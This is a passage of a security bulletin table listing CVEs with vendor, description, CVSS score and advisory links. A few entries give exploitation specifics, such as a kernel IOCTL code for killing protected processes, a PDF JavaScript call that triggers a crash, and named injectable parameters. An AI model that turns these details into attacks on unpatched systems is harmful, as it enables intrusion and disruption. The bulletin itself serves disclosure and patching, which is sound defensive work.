| Eaton--IPP software | A security misconfiguration was identified in Eaton Intelligent Power Protector (IPP), where an HTTP response header was set with an insecure attribute, potentially exposing users to web‑based attacks. This security issue has been fixed in the latest version of Eaton IPP software which is available on the Eaton download centre. | 2026-04-16 | 5.9 | CVE-2026-22618 | https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/etn-va-2025-1025.pdf |
| Wago--Smart Designer | In Wago Smart Designer in versions up to 2.33.1 a low privileged remote attacker may enumerate projects and usernames through iterative requests to an specific endpoint. | 2026-04-16 | 4.3 | CVE-2023-5872 | https://certvde.com/de/advisories/VDE-2023-045 https://wago.csaf-tp.certvde.com/.well-known/csaf/white/2023/vde-2023-045.json |
| Vision--Helpdesk | Vision Helpdesk before 5.7.0 (patched in 5.6.10) allows attackers to read user profiles via modified serialized cookie data to vis_client_id. | 2026-04-16 | 4.3 | CVE-2024-58343 | https://github.com/websec/Vision-Helpdesk-Exploit https://websec.net/blog/critical-vulnerability-in-vision-helpdesk-allows-unauthorized-session-access-67264646bde7fa99ea26446f |
| Zaytech--Smart Online Order for Clover | Cross-Site Request Forgery (CSRF) vulnerability in Zaytech Smart Online Order for Clover allows Cross Site Request Forgery.This issue affects Smart Online Order for Clover: from n/a through 1.6.0. | 2026-04-15 | 4.3 | CVE-2025-15635 | https://patchstack.com/database/wordpress/plugin/clover-online-orders/vulnerability/wordpress-smart-online-order-for-clover-plugin-1-6-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Dell--PowerScale OneFS | Dell PowerScale OneFS, versions prior to 9.12.0.0, contains an improper check for unusual or exceptional conditions vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to denial of service. | 2026-04-16 | 4.1 | CVE-2025-43883 | https://www.dell.com/support/kbdoc/en-us/000376214/dsa-2025-347-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities |
| Dell--PowerScale OneFS | Dell PowerScale OneFS, versions prior to 9.12.0.0, contains an improper resource shutdown or release vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to denial of service. | 2026-04-16 | 4.4 | CVE-2025-43935 | https://www.dell.com/support/kbdoc/en-us/000376214/dsa-2025-347-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities |
| DeluxeThemes--Userpro | Cross-Site Request Forgery (CSRF) vulnerability in DeluxeThemes Userpro allows Cross Site Request Forgery.This issue affects Userpro: from n/a before 5.1.11. | 2026-04-15 | 4.3 | CVE-2025-53444 | https://patchstack.com/database/wordpress/plugin/userpro/vulnerability/wordpress-userpro-plugin-5-1-11-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Fortinet--FortiSOAR on-premise | A server-side request forgery (ssrf) vulnerability [CWE-918] vulnerability in Fortinet FortiSOAR PaaS 7.6.4, FortiSOAR PaaS 7.6.0 through 7.6.2, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.4, FortiSOAR on-premise 7.6.0 through 7.6.2, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated attacker to discover services running on local ports via crafted requests. | 2026-04-14 | 4.1 | CVE-2025-59809 | https://fortiguard.fortinet.com/psirt/FG-IR-26-103 |
| Fortinet--FortiSandbox PaaS | An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.4, FortiSandbox PaaS 5.0.0 through 5.0.4 may allow an attacker to perform an XSS attack via crafted HTTP requests. | 2026-04-14 | 4.9 | CVE-2025-61886 | https://fortiguard.fortinet.com/psirt/FG-IR-26-109 |
| themefusion--Avada (Fusion) Builder | The Avada (Fusion) Builder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.15.1. This is due to the plugin's `fusion_get_post_custom_field()` function failing to validate whether metadata keys are protected (underscore-prefixed). This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract protected post metadata fields that should not be publicly accessible via the Dynamic Data feature's `post_custom_field` parameter. | 2026-04-15 | 4.3 | CVE-2026-1541 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f1f69f93-80e3-434d-98a6-fc8757b4e6d1?source=cve https://themeforest.net/item/avada-responsive-multipurpose-theme/2833226 |
| Cisco--Cisco Unity Connection | A vulnerability in the web-based management interface of Cisco Unity Connection could allow an unauthenticated, remote attacker to redirect a user to a malicious web page. This vulnerability is due to improper input validation of HTTP request parameters. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to redirect a user to a malicious web page. | 2026-04-15 | 4.7 | CVE-2026-20060 | cisco-sa-unity-vulns-n2EJSbbw |
| Cisco--Cisco Unity Connection | A vulnerability in the web-based management interface of Cisco Unity Connection could allow an authenticated, remote attacker to perform an SQL injection attack against an affected device. To exploit this vulnerability, the attacker must have valid user credentials on the affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP(S) request to the web-based management interface of an affected device. A successful exploit could allow the attacker to view data on the affected device. | 2026-04-15 | 4.3 | CVE-2026-20061 | cisco-sa-unity-vulns-n2EJSbbw |
| Cisco--Cisco Identity Services Engine Software | Multiple vulnerabilities in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker with administrative write privileges to conduct a stored cross-site scripting (XSS) attack or a reflected XSS attack against a user of the web-based management interface of an affected device. These vulnerabilities are due to insufficient sanitization of user-supplied data that is stored in the web page. An attacker could exploit these vulnerabilities by convincing a user of the interface to click a specific link or view an affected web page. The injected script code may be executed in the context of the web-based management interface or allow the attacker to access sensitive browser-based information. | 2026-04-15 | 4.8 | CVE-2026-20132 | cisco-sa-isexss-BS8ctE7U |
| Cisco--Cisco Identity Services Engine Software | A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to perform path traversal attacks on the underlying operating system and read arbitrary files. To exploit this vulnerability, the attacker must have valid administrative credentials. This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected system. A successful exploit could allow the attacker to access sensitive files on the affected system. | 2026-04-15 | 4.9 | CVE-2026-20148 | cisco-sa-ise-rce-traversal-8bYndVrZ |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.2.2, 10.0.5, 9.4.10, and 9.3.11, and Splunk Cloud Platform versions below 10.4.2603.0, 10.3.2512.6, 10.2.2510.10, 10.1.2507.19, 10.0.2503.13, and 9.3.2411.127, a low-privileged user that does not hold the `admin` or `power` Splunk roles, has write permission on the app, and does not hold the high-privilege capability `accelerate_datamodel`, could turn on or off Data Model Acceleration due to improper access control. | 2026-04-15 | 4.3 | CVE-2026-20203 | https://advisory.splunk.com/advisories/SVD-2026-0402 |
| Microsoft--Windows 10 Version 1607 | Improper removal of sensitive information before storage or transfer in Windows Recovery Environment Agent allows an unauthorized attacker to bypass a security feature with a physical attack. | 2026-04-14 | 4.6 | CVE-2026-20928 | Windows Recovery Environment Security Feature Bypass Vulnerability |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-04-14 | 4.6 | CVE-2026-20945 | Microsoft SharePoint Server Spoofing Vulnerability |
| Fortinet--FortiSOAR PaaS | An improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.3, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.3, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to perform a stored cross site scripting (XSS) attack via crafted HTTP Requests. | 2026-04-14 | 4.4 | CVE-2026-22154 | https://fortiguard.fortinet.com/psirt/FG-IR-26-117 |
| Fortinet--FortiSOAR PaaS | A storing passwords in a recoverable format vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.4, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.4, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to retrieve Service account password via server address modification in LDAP configuration. | 2026-04-14 | 4.1 | CVE-2026-22574 | https://fortiguard.fortinet.com/psirt/FG-IR-26-105 |
| Fortinet--FortiSOAR PaaS | A storing passwords in a recoverable format vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.4, FortiSOAR PaaS 7.5.0 through 7.5.2, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.4, FortiSOAR on-premise 7.5.0 through 7.5.2, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow an authenticated remote attacker to retrieve passwords for multiple installed connectors via server address modification in connector configuration. | 2026-04-14 | 4.1 | CVE-2026-22576 | https://fortiguard.fortinet.com/psirt/FG-IR-26-104 |
| octobercms--october | October is a Content Management System (CMS) and web platform. Versions prior to 3.7.13 and versions 4.0.0 through 4.1.4 contain a sandbox bypass vulnerability in the optional Twig safe mode feature (CMS_SAFE_MODE). Certain methods on the collect() helper were not properly restricted, allowing authenticated users with template editing permissions to bypass sandbox protections. Exploitation requires authenticated backend access with CMS template editing permissions and only affects installations with CMS_SAFE_MODE enabled (disabled by default). This issue has been fixed in versions 3.7.13 and 4.1.5. To workaround this issue, users can disable CMS_SAFE_MODE if untrusted template editing is not required, and restrict CMS template editing permissions to fully trusted administrators only. | 2026-04-14 | 4.9 | CVE-2026-22692 | https://github.com/octobercms/october/security/advisories/GHSA-m5qg-jc75-4jp6 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| WSO2--WSO2 API Manager | The component accepts XML input through the publisher without disabling external entity resolution. This allows malicious actors to submit a crafted XML payload that exploits the unescaped external entity references. By leveraging this vulnerability, a malicious actor can read confidential files from the product's file system or access limited HTTP resources reachable via HTTP GET requests to the vulnerable product. | 2026-04-16 | 3.5 | CVE-2024-8010 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3581/ |
| 1Panel-dev--MaxKB | A vulnerability has been found in 1Panel-dev MaxKB up to 2.4.2. Impacted is an unknown function of the file ui/src/chat.ts of the component MdPreview. Such manipulation leads to cross site scripting. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.5.0 is recommended to address this issue. The name of the patch is 7230daa5ec3e6574b6ede83dd48a4fbc0e70b8d8. It is advisable to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-04-13 | 3.5 | CVE-2025-15632 | VDB-356967 | 1Panel-dev MaxKB MdPreview chat.ts cross site scripting VDB-356967 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #782265 | 1Panel-dev MaxKB <= v2.6.1 Stored XSS https://github.com/AnalogyC0de/public_exp/issues/28 https://github.com/1Panel-dev/MaxKB/pull/4578 https://github.com/1Panel-dev/MaxKB/commit/7230daa5ec3e6574b6ede83dd48a4fbc0e70b8d8 https://github.com/1Panel-dev/MaxKB/releases/tag/v2.5.0 https://github.com/1Panel-dev/MaxKB/ |
| Siemens--Siemens Software Center | A vulnerability has been identified in Siemens Software Center (All versions < V3.5.8.2), Simcenter 3D (All versions < V2506.6000), Simcenter Femap (All versions < V2506.0002), Simcenter STAR-CCM+ (All versions < V2602), Solid Edge SE2025 (All versions < V225.0 Update 13), Solid Edge SE2026 (All versions < V226.0 Update 04), Tecnomatix Plant Simulation (All versions < V2504.0008). Affected applications do not properly validate client certificates to connect to Analytics Service endpoint. This could allow an unauthenticated remote attacker to perform man in the middle attacks. | 2026-04-14 | 3.7 | CVE-2025-40745 | https://cert-portal.siemens.com/productcert/html/ssa-981622.html |
| Grafana--Grafana Correlations | --- title: Cross-Tenant Legacy Correlation Disclosure and Deletion draft: false hero: image: /static/img/heros/hero-legal2.svg content: "# Cross-Tenant Legacy Correlation Disclosure and Deletion" date: 2026-01-29 product: Grafana severity: Low cve: CVE-2026-21727 cvss_score: "3.3" cvss_vector: "CVSS:3.3/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N" fixed_versions: - ">=11.6.11 >=12.0.9 >=12.1.6 >=12.2.4" --- A cross-tenant isolation vulnerability was found in Grafana's Correlations feature affecting legacy correlation records. Due to a backward compatibility condition allowing org_id = 0 records to be returned across organizations, a user with datasource management privileges could read and permanently delete legacy correlation data belonging to another organization. This issue affects correlations created prior to Grafana 10.2 and is fixed in >=11.6.11, >=12.0.9, >=12.1.6, and >=12.2.4. Thanks to Gyu-hyeok Lee (g2h) for reporting this vulnerability. | 2026-04-15 | 3.3 | CVE-2026-21727 | https://grafana.com/security/security-advisories/cve-2026-21727 |
| HCL--AION | HCL AION is affected by a vulnerability where certain system behaviours may allow exploration of internal filesystem structures. Exposure of such information may provide insights into the underlying environment, which could potentially aid in further targeted actions or limited information disclosure. | 2026-04-15 | 2.9 | CVE-2025-52641 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130007 |
| Fortinet--FortiNAC-F | An URL Redirection to Untrusted Site ('Open Redirect') vulnerability [CWE-601] vulnerability in Fortinet FortiNAC-F 7.6.0 through 7.6.5, FortiNAC-F 7.4 all versions, FortiNAC-F 7.2 all versions may allow a remote privileged attacker with system administrator role to redirect users to an arbitrary website via crafted CSV file. | 2026-04-14 | 2.2 | CVE-2026-21741 | https://fortiguard.fortinet.com/psirt/FG-IR-26-118 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| AMD--AMD EPYC 7003 Series Processors | Insufficient checks of the RMP on host buffer access in IOMMU may allow an attacker with privileges and a compromised hypervisor to trigger an out of bounds condition without RMP checks, resulting in a potential loss of confidential guest integrity. | 2026-04-16 | not yet calculated | CVE-2023-20585 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3016.html |
| n/a--NietThijmen ShoppingCart 0.0.2 | Command injection in the connect function in NietThijmen ShoppingCart 0.0.2 allows an attacker to execute arbitrary shell commands and achieve remote code execution via injection of malicious payloads into the Port field | 2026-04-15 | not yet calculated | CVE-2024-53412 | https://github.com/NietThijmen/ShoppingCart/issues/1 https://github.com/Buckdray/vulnerability-research/blob/main/CVE-2024-53412/README.md |
| Grafana--Grafana Alerting | In Grafana's alerting system, users with edit permissions for a contact point, specifically the permissions "alert.notifications:write" or "alert.notifications.receivers:test" that are granted as part of the fixed role "Contact Point Writer", which is part of the basic role Editor - can edit contact points created by other users, modify the endpoint URL to a controlled server. By invoking the test functionality, attackers can capture and extract redacted secure settings, such as authentication credentials for third-party services (e.g., Slack tokens). This leads to unauthorized access and potential compromise of external integrations. | 2026-04-15 | not yet calculated | CVE-2025-12141 | https://grafana.com/security/security-advisories/cve-2025-12141/ |
| MCPHub--MCPHub | MCPHub in versions below 0.11.0 is vulnerable to authentication bypass. Some endpoints are not protected by authentication middleware, allowing an unauthenticated attacker to perform actions in the name of other users and using their privileges. | 2026-04-14 | not yet calculated | CVE-2025-13822 | https://github.com/samanhappy/mcphub https://cert.pl/en/posts/2026/04/CVE-2025-13822 |
| Legion of the Bouncy Castle Inc.--BC-JAVA | Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcprov on all (core modules). This vulnerability is associated with program files G3413CTRBlockCipher. GOSTCTR implementation unable to process more than 255 blocks correctly. This issue affects BC-JAVA: from 1.59 before 1.84. | 2026-04-15 | not yet calculated | CVE-2025-14813 | https://github.com/bcgit/bc-java/wiki/CVE%E2%80%902025%E2%80%9014813 https://github.com/bcgit/bc-java/commit/b42574345414e4b7c8051b16fa1fafe01c29871f https://github.com/bcgit/bc-java/commit/701686cb0184cd9ae103c801b3581fdf95c6d4f3 |
| Unknown--Form Maker by 10Web | The Form Maker by 10Web WordPress plugin before 1.15.38 does not properly prepare SQL queries when the "MySQL Mapping" feature is in use, which could make SQL Injection attacks possible in certain contexts. | 2026-04-13 | not yet calculated | CVE-2025-15441 | https://wpscan.com/vulnerability/41f69b0a-4d17-4a6b-b803-ea1c370e3cc0/ |
| OpenText, Inc--RightFax | Deserialization of untrusted data vulnerability in OpenText, Inc RightFax on Windows, 64 bit, 32 bit allows Object Injection.This issue affects RightFax: through 25.4. | 2026-04-15 | not yet calculated | CVE-2025-15610 | https://support.opentext.com/csm?id=ot_kb_unauthenticated&sysparm_article=KB0861863 |
| Sparx Systems Pty Ltd.--Sparx Enterprise Architect | Insufficiently Protected Credentials in Sparx Systems Pty Ltd. Sparx Enterprise Architect. Client does not verify the receiver of OAuth2 credentials during OpenID authentication | 2026-04-16 | not yet calculated | CVE-2025-15621 | https://sparxsystems.com/products/ea/17.1/history.html |
| Sparx Systems Pty Ltd.--Sparx Enterprise Architect | Insufficiently Protected Credentials vulnerability in Sparx Systems Pty Ltd. Sparx Enterprise Architect. Client reveals plaintext OAuth2 client secretDesktop client decodes the secret and uses the plaintext secret to exchange it into an access and id tokens as part of the OpenID authentication flow. | 2026-04-17 | not yet calculated | CVE-2025-15622 | https://sparxsystems.com/products/ea/17.1/history.html |
| Sparx Systems Pty Ltd.--Sparx Pro Cloud Server | Exposure of Private Personal Information to an Unauthorized Actor, : Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Sparx Systems Pty Ltd. Sparx Pro Cloud Server. Unauthenticated user can retrieve database password in plaintext in certain situations | 2026-04-17 | not yet calculated | CVE-2025-15623 | https://sparxsystems.com/products/procloudserver/6.1/history.html |
| Sparx Systems Pty Ltd.--Sparx Pro Cloud Server | Plaintext Storage of a Password vulnerability in Sparx Systems Pty Ltd. Sparx Pro Cloud Server. In a setup where OpenID is used as the primary method of authentication to authenticate to Sparx EA, Pro Cloud Server creates local passwords to the users and stores them in plaintext. | 2026-04-17 | not yet calculated | CVE-2025-15624 | https://sparxsystems.com/products/procloudserver/6.1/history.html |
| Sparx Systems Pty Ltd.--Sparx Pro Cloud Server | Unauthenticated user is able to execute arbitrary SQL commands in Sparx Pro Cloud Server database in certain cases. | 2026-04-17 | not yet calculated | CVE-2025-15625 | https://sparxsystems.com/products/procloudserver/6.1/history.html |
| n/a--Phpgurukul Online Course | In Phpgurukul Online Course Registration v3.1, an arbitrary file upload vulnerability was discovered within the profile picture upload functionality on the /my-profile.php page. | 2026-04-13 | not yet calculated | CVE-2025-51414 | https://github.com/12T40910/CVE/issues/12 https://medium.com/@tanushkushtk01/cve-2025-51414-unrestricted-file-upload-in-online-course-registration-v3-1-bd8b839be1d7 |
| AMD--AMD EPYC 9004 Series Processors | Incorrect use of boot service in the AMD Platform Configuration Blob (APCB) SMM driver could allow a privileged attacker with local access (Ring 0) to achieve privilege escalation potentially resulting in arbitrary code execution. | 2026-04-16 | not yet calculated | CVE-2025-54502 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-7054.html |
| AMD--AMD EPYC 9004 Series Processors | A missing lock verification in AMD Secure Processor (ASP) firmware may permit a locally authenticated attacker with administrative privileges to alter MMIO routing on some Zen 5-based products, potentially compromising guest system integrity. | 2026-04-16 | not yet calculated | CVE-2025-54510 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3034.html |
| Apache Software Foundation--Apache Airflow | The example example_xcom that was included in airflow documentation implemented unsafe pattern of reading value from xcom in the way that could be exploited to allow UI user who had access to modify XComs to perform arbitrary execution of code on the worker. Since the UI users are already highly trusted, this is a Low severity vulnerability. It does not affect Airflow release - example_dags are not supposed to be enabled in production environment, however users following the example could replicate the bad pattern. Documentation of Airflow 3.2.0 contains version of the example with improved resiliance for that case. Users who followed that pattern are advised to adjust their implementations accordingly. | 2026-04-15 | not yet calculated | CVE-2025-54550 | https://lists.apache.org/thread/3mf4cfx070ofsnf9qy0s2v5gqb5sc2g1 https://github.com/apache/airflow/pull/63200 |
| Openai[.]com-- Codex CLI v0.23.0 | A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enables code execution through malicious MCP (Model Context Protocol) configuration files. The attack is triggered when a user runs the codex command inside a malicious or compromised repository. Codex automatically loads project-local .env and .codex/config.toml files without requiring user confirmation, allowing attackers to embed arbitrary commands that execute immediately. | 2026-04-14 | not yet calculated | CVE-2025-61260 | http://openai.com https://research.checkpoint.com/2025/openai-codex-cli-command-injection-vulnerability/ |
| Snipe-it[.]com--Snipe-IT asset management v8.3.0 | Cross-Site Scripting vulnerability in the Snipe-IT web-based asset management system v8.3.0 to up and including v8.3.1 allows authenticated attacker with lowest privileges sufficient only to log in, to inject arbitrary JavaScript code via "Name" and "Surname" fields. The JavaScript code is executed whenever "Activity Report" or modified profile is viewed directly by any user with sufficient permissions. Successful exploitation of this issue requires that the profile's "Display Name" is not set. The vulnerability is fixed in v8.3.2. | 2026-04-13 | not yet calculated | CVE-2025-63743 | http://grokability.com http://snipe-it.com https://github.com/grokability/snipe-it/commit/b6d397bcca4e8a05176b782de769d7160058bfc4#diff-7fe056d76c09808dac923c4639161d587c3fff281a01122f3e10c4a781674a65 https://github.com/mikust/CVEs/tree/main/CVE-2025-63743 |
| n/a-- hotel-management-php version 1.0 | alandsilva26 hotel-management-php 1.0 is vulnerable to Cross Site Scripting (XSS) in /public/admin/edit_room.php which allows an attacker to inject and execute arbitrary JavaScript via the room_id GET parameter. | 2026-04-14 | not yet calculated | CVE-2025-65132 | https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65132/README.md |
| n/a--School Management System v1.0 | A SQL injection vulnerability exists in the School Management System (version 1.0) by manikandan580. An unauthenticated or authenticated remote attacker can supply a crafted HTTP request to the affected endpoint to manipulate SQL query logic and extract sensitive database information. | 2026-04-14 | not yet calculated | CVE-2025-65133 | https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65133/README.md |
| n/a--School Management System v1.0 | In manikandan580 School-management-system 1.0, a reflected cross-site scripting (XSS) vulnerability exists in /studentms/admin/contact-us.php via the email POST parameter. | 2026-04-14 | not yet calculated | CVE-2025-65134 | https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65134/README.md |
| n/a--School Management System v1.0 | In manikandan580 School-management-system 1.0, a reflected XSS vulnerability exists in /studentms/admin/contact-us.php via the pagedes POST parameter. | 2026-04-14 | not yet calculated | CVE-2025-65136 | https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2025-65136/README.md |
| Apache Software Foundation--Apache Airflow | Before Airflow 3.2.0, it was unclear that secure Airflow deployments require the Deployment Manager to take appropriate actions and pay attention to security details and security model of Airflow. Some assumptions the Deployment Manager could make were not clear or explicit enough, even though Airflow's intentions and security model of Airflow did not suggest different assumptions. The overall security model [1], workload isolation [2], and JWT authentication details [3] are now described in more detail. Users concerned with role isolation and following the Airflow security model of Airflow are advised to upgrade to Airflow 3.2, where several security improvements have been implemented. They should also read and follow the relevant documents to make sure that their deployment is secure enough. It also clarifies that the Deployment Manager is ultimately responsible for securing your Airflow deployment. This had also been communicated via Airflow 3.2.0 Blog announcement [4]. [1] Security Model: https://airflow.apache.org/docs/apache-airflow/stable/security/jwt_token_authentication.html [2] Workload isolation: https://airflow.apache.org/docs/apache-airflow/stable/security/workload.html [3] JWT Token authentication: https://airflow.apache.org/docs/apache-airflow/stable/security/jwt_token_authentication.html [4] Airflow 3.2.0 Blog announcement: https://airflow.apache.org/blog/airflow-3.2.0/ Users are recommended to upgrade to version 3.2.0, which fixes this issue. | 2026-04-13 | not yet calculated | CVE-2025-66236 | https://github.com/apache/airflow/pull/58662 https://lists.apache.org/thread/g8fyy1tkmxkkfk7tx2v6h8mvwzpyykbo |
| gonitro[.]com-- Nitro PDF Pro v14.41.1.4 | A NULL pointer dereference in Nitro PDF Pro for Windows v14.41.1.4 allows attackers to cause a Denial of Service (DoS) via a crafted XFA packet. | 2026-04-13 | not yet calculated | CVE-2025-66769 | https://www.gonitro.com/ https://jeroscope.com/advisories/2025/jero-2025-015/ |
| nordicsemi[.]no--IronSide SE | Nordic Semiconductor IronSide SE for nRF54H20 before 23.0.2+17 has an Algorithmic complexity issue. | 2026-04-15 | not yet calculated | CVE-2025-67841 | https://nordicsemi.no https://docs.nordicsemi.com/bundle/SA/resource/SA-2025-447-v1.1.pdf |
| gonitro[.]com-- Nitro PDF Pro v14.41.1.4 | Nitro PDF Pro for Windows 14.41.1.4 contains a NULL pointer dereference vulnerability in the JavaScript implementation of app.alert(). When app.alert() is called with more than one argument and the first argument evaluates to null (for example, app.alert(app.activeDocs, true) when app.activeDocs is null), the engine routes the call through a fallback path intended for non-string arguments. In this path, js_ValueToString() is invoked on the null value and returns an invalid string pointer, which is then passed to JS_GetStringChars() without validation. Dereferencing this pointer leads to an access violation and application crash when opening a crafted PDF. | 2026-04-13 | not yet calculated | CVE-2025-69624 | http://nitro.com |
| gonitro[.]com-- Nitro PDF Pro v14.41.1.4 | Nitro PDF Pro for Windows 14.41.1.4 contains a heap use-after-free vulnerability in the implementation of the JavaScript method this.mailDoc(). During execution, an internal XID object is allocated and then freed prematurely, after which the freed pointer is still passed into UI and logging helper functions. Because the freed memory region may contain unpredictable heap data or remnants of attacker-controlled JavaScript strings, downstream routines such as wcscmp() may process invalid or stale pointers. This can result in access violations and non-deterministic crashes. | 2026-04-13 | not yet calculated | CVE-2025-69627 | http://nitro.com https://jeroscope.com/advisories/2025/jero-2025-016/ |
| trezor[.]com--Trezor One v1.13.0 | A side-channel vulnerability exists in the implementation of BIP-39 mnemonic processing, as observed in Trezor One v1.13.0 to v1.14.0, Trezor T v1.13.0 to v1.14.0, and Trezor Safe v1.13.0 to v1.14.0 hardware wallets. This originates from the BIP-39 standard guidelines, which induce non-constant time execution and specific branch patterns for word searching. An attacker with physical access during the initial setup phase can collect a single side-channel trace. By utilizing profiling-based Deep Learning Side-Channel Analysis (DL-SCA), the attacker can recover the mnemonic code and subsequently steal the assets. The issue was patched. | 2026-04-14 | not yet calculated | CVE-2025-69893 | http://trezor.com https://trezor.io/vulnerability/fix-side-channel-in-bip-39-mnemonic-processing-when-unlocked |
| n/a-- transloadit uppy v0.25.6 | An issue pertaining to CWE-843: Access of Resource Using Incompatible Type was discovered in transloadit uppy v0.25.6. | 2026-04-14 | not yet calculated | CVE-2025-70023 | https://github.com/transloadi https://github.com/transloadit/uppy https://gist.github.com/zcxlighthouse/27926a85371ac5d2291f44903254753e |
| Safetica Application suite-- STProcessMonitor 11.11.4.0 | STProcessMonitor 11.11.4.0, part of the Safetica Application suite, allows an admin-privileged user to send crafted IOCTL requests to terminate processes that are protected through a third-party implementation. This is caused by insufficient caller validation in the driver's IOCTL handler, enabling unauthorized processes to perform those actions in kernel space. Successful exploitation can lead to denial of service by disrupting critical third-party services or applications. Unauthorized processes load the driver and send a crafted IOCTL request (0xB822200C) to terminate processes protected by a third-party implementation. This action exploits insufficient caller validation in the driver's IOCTL handler, allowing unauthorized processes to perform termination operations in kernel space. Successful exploitation can lead to denial of service by disrupting critical third-party services or applications. | 2026-04-17 | not yet calculated | CVE-2025-70795 | https://bbs.kafan.cn/thread-2287429-1-1.html https://bbs.kafan.cn/thread-2287429-2-1.html https://www.virustotal.com/gui/file/70bcec00c215fe52779700f74e9bd669ff836f594df92381cbfb7ee0568e7a8b https://www.virustotal.com/gui/file/9ace6a1e4bee5834be38b4c2fd26780d1fcc18ea9d58224e31d6382c19e53296 https://www.virustotal.com/gui/file/fc3588482f596a067b65d5d64d21fe62463b38a138fc87d8d2350efa86d34284 https://github.com/magicsword-io/LOLDrivers/commit/eea8326bf891d810902203e9ac5cfdeaf5a17a1c https://github.com/magicsword-io/LOLDrivers/issues/268 |
| Vtiger[.]com-- Vtiger CRM 8.4.0 | Vtiger CRM 8.4.0 contains a reflected cross-site scripting (XSS) vulnerability in the MailManager module. Improper handling of user-controlled input in the _folder parameter allows a specially crafted, double URL-encoded payload to be reflected and executed in the context of an authenticated user s session. | 2026-04-13 | not yet calculated | CVE-2025-70936 | https://www.vtiger.com/open-source-crm/ https://www.simonjuguna.com/cve-2025-70936-reflected-xss-vulnerability-in-vtiger-crm-v8-4-0/ |
| Progress Software Corporation--OpenEdge | A vulnerability in the AdminServer component of OpenEdge on all supported platforms grants its authenticated users OS-level access to the server through the adopted authority of the AdminServer process itself. The delegated authority of the AdminServer could allow its users the ability to read arbitrary files on the host system through the misuse of the setFile() and openFile() methods exposed through the RMI interface. Misuse was limited only by OS-level authority of the AdminServer's elevated privileges granted and the user's access to these methods enabled through RMI. The exploitable methods have been removed thus eliminating their access through RMI or downstream of the RMI registry. | 2026-04-14 | not yet calculated | CVE-2025-7389 | https://community.progress.com/s/article/Important-Arbitrary-File-Ready-Security-Update-for-OpenEdge-AdminServer |
| Progress Software Corporation--OpenEdge | The OECH1 prefix encoding is intended to obfuscate values across the OpenEdge platform. It has been identified as cryptographically weak and unsuitable for stored encodings and enterprise applications. OECH1 encodings should be considered exploitable and immediately replaced by any other supported prefix encoding, all of which are based on symmetric encryption. | 2026-04-14 | not yet calculated | CVE-2025-8095 | https://community.progress.com/s/article/Unintended-Use-of-OECH1-for-Password-Secrets-Protection |
